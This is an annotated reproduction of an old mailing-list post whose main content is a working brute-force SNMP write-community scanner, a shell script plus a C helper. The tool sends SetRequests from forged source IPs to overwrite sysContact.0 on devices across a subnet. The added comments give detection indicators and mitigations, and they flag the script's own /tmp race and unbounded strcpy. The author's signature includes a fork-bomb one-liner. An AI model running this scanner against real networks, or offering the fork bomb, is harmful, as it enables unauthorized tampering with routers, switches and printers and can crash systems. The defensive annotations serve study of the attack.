Hmm, to keep you busy, here's a brute-force spoofing scanner for writable SNMP communities. It requires NetCat and the SNMP tools (like snmpget) to be installed. Scanning is mostly harmless - it tries to change system.sysContact.0 to 'null' using common default communities (according to SecurityFocus). It should be run as root. In addition to the list of machines given in the initial post, it is known to break some Cisco systems (but not recent IOSes, at least not in the default configuration), most 3Com products (there is another writable community, which seems to be present everywhere regardless of 'private', which administrators sometimes disable), HP switches, printers, Ascend *DSL modems, etc. Also, it should bypass most of the stupid source IP address restrictions on access to the community. Please use this tool to scan your network only. _______________________________________________________ Michal Zalewski * [[EMAIL PROTECTED]] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
#!/bin/sh
# Brute-force SNMP write-community scanner (mailing-list post, 2000 era).
#
# What it does: for every host of one /24 (plus the router hops on the way
# there), check whether the host answers an SNMP read with community 'public';
# if so, try a list of default/common community strings as WRITE communities
# by sending an SNMPv1 SetRequest that sets system.sysContact.0 to the string
# 'null', and read sysContact.0 back to see whether the write took effect.
#
# Defender notes (what this looks like and what stops it):
#   - Wire indicators: sequential sysDescr.0 / sysContact.0 reads with
#     community 'public' across a /24, interleaved with UDP/161 SetRequests
#     whose source address is forged (127.0.0.1, the target's own address,
#     and <subnet>.1 are used below). Anti-spoofing filters (BCP38 / uRPF) at
#     the network edge make the forged-source variants undeliverable.
#   - Host indicator: sysContact.0 changed to 'null'. Monitoring that object
#     for changes detects a successful run after the fact.
#   - Control: SNMPv3 authentication, or at minimum non-default, read-only
#     communities. A source-IP ACL on a community is exactly what the forged
#     sources are meant to get past, so it is not sufficient on its own.
#
# Scanning-host notes:
#   - Written for bash ('&>' redirection, 'let') despite the #!/bin/sh shebang.
#   - Runs 'killall traceroute' and 'killall nc', which kill every such
#     process on the host, not just the ones started here.
#   - The helper is written to /tmp/spoof-<pid>.c and compiled to
#     /tmp/spoof-<pid>: a predictable name under /tmp, written as root, which
#     is a classic symlink / pre-creation race exposure on the scanning host.
#
# Usage: script start_octet c_subnet   (e.g. '0 172.16.1' scans 172.16.1.0-255)
# Files: .walk.tmp, .walk.tmp2 (scratch, CWD), WYSZLO (results, CWD).

# Start clean: scratch files and the result file in the CWD, plus ANY
# /tmp/spoof-* left behind by earlier runs (of any user).
rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null
echo "snmpd vulnerability scanner by <[EMAIL PROTECTED]>"
echo
x=$1      # host octet to start scanning at
PRE=$2    # first three octets of the /24, e.g. 172.16.1
if [ "$2" = "" ]; then
  echo "Usage: $0 start_at c_subnet"
  echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255."
  echo
  exit
fi
# NOTE(review): predictable, PID-based path under /tmp written as root (see
# scanning-host notes above).
SPFILE="/tmp/spoof-$$"
cat >$SPFILE.c <<_EOF_
/* Helper: writes one raw SNMPv1 SetRequest datagram to stdout.
   community  = argv[1]
   varbind    = sysContact.0 (1.3.6.1.2.1.1.4.0) := OCTET STRING "null"
   part1 is the message header up to and including the community OCTET
   STRING tag; the one-byte community length and the community itself are
   spliced in after it; part2 is the fixed SetRequest PDU.
   The strcpy of argv[1] into the 1000-byte buffer is unbounded and the
   length is truncated to a single byte. */
char buf[1000];
char part1[]="0\202\0-\2\1\0\4";
char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main(int argc,char**argv) {
  char x=strlen(argv[1]);
  memcpy(buf,part1,sizeof(part1)-1);
  memcpy(buf+sizeof(part1)-1,&x,1);
  strcpy(buf+sizeof(part1),argv[1]);
  memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1);
  write(1,buf,x+1+sizeof(part1)+sizeof(part2));
}
_EOF_
echo "Compiling helper application..."
gcc -o $SPFILE $SPFILE.c
# Silent exit if the helper did not compile.
test -x $SPFILE || exit
echo "Scan range: $PRE.$x-255..."
# Only when starting at .0: run traceroute toward <subnet>.32 for 6 seconds
# (hop 3 onward, numeric output) and put the hop addresses ($2 of each line)
# at the top of the target list -- the routers on the path are probed too.
if [ "$1" = "0" ]; then
  echo "* Collecting routing information (6 seconds)..."
  /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp &
  sleep 6
  killall traceroute &>/dev/null   # kills every traceroute on this host
  awk '{print $2}' .walk.tmp >.walk.tmp2
fi
echo "Starting scan. 
Outfile is: WYSZLO"
# Append the hosts <subnet>.<x> .. <subnet>.255 to the target list.
while [ "$x" -lt "256" ]; do
  echo $PRE.$x >>.walk.tmp2
  let x=x+1
done
# Community strings tried as WRITE communities. 'all private', 'Secret C0de'
# and the first word of the host's sysDescr are added to this list below.
COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default password tivoli openview community snmp snmpd system"
# The target list is expanded once here; .walk.tmp2 is reused as scratch
# inside the loop body without affecting the iteration.
for i in `cat .walk.tmp2`; do
  echo -n "$i: "
  # Liveness/read check with community 'public'. snmpget's stdout and stderr
  # are captured together; any of these words in the output counts as
  # "no usable answer" and the host is skipped.
  snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
  ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`"
  if [ "$ERR" = "0" ]; then
    echo "OK"
    echo -n " system: "
    # SYS = the quoted sysDescr text (second double-quote-delimited field).
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYS="`cat .walk.tmp2`"
    echo "$SYS"
    # sysDescr.0 is fetched a second time (not sysName.0); SYSNAME is the
    # first whitespace-delimited token of that description and is used as
    # one more community guess.
    snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYSNAME="`awk '{print $1}' .walk.tmp2`"
    echo "$i ($SYS):" >>WYSZLO   # WYSZLO: result file (Polish, "came out")
    for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do
      echo -n " $j> "
      # The same SetRequest is sent four times via nc, each with a different
      # source address: the default, 127.0.0.1, the target's own address, and
      # <subnet>.1 (presumably the gateway -- not verified). The last three
      # are forged sources aimed at source-IP-based community restrictions;
      # ingress anti-spoofing filtering is what makes them undeliverable.
      $SPFILE "$j" | nc -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null &
      # One second for the UDP sends, then kill EVERY nc on this host.
      sleep 1
      killall nc &>/dev/null
      # Success check: read sysContact.0 back with 'public' and look for
      # 'null'. Any output line containing that substring counts, so a device
      # whose contact string already contains 'null' (or an error message
      # containing it) is reported as WORKED for the first community tried.
      snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp
      WORKED="`grep -c null .walk.tmp 2>/dev/null`"
      if [ "$WORKED" = "0" ]; then
        echo " - $j failed." >>WYSZLO
        echo "failed."
      else
        echo "OK"
        echo " - $j WORKED." >>WYSZLO
        break   # first working community ends the search for this host
      fi
    done
  else
    echo "milczy..."   # Polish: "silent..." -- no SNMP read answer with 'public'
  fi
done
echo "Done."
# Remove scratch files and the compiled helper (WYSZLO is kept).
rm -f .walk.tmp* $SPFILE*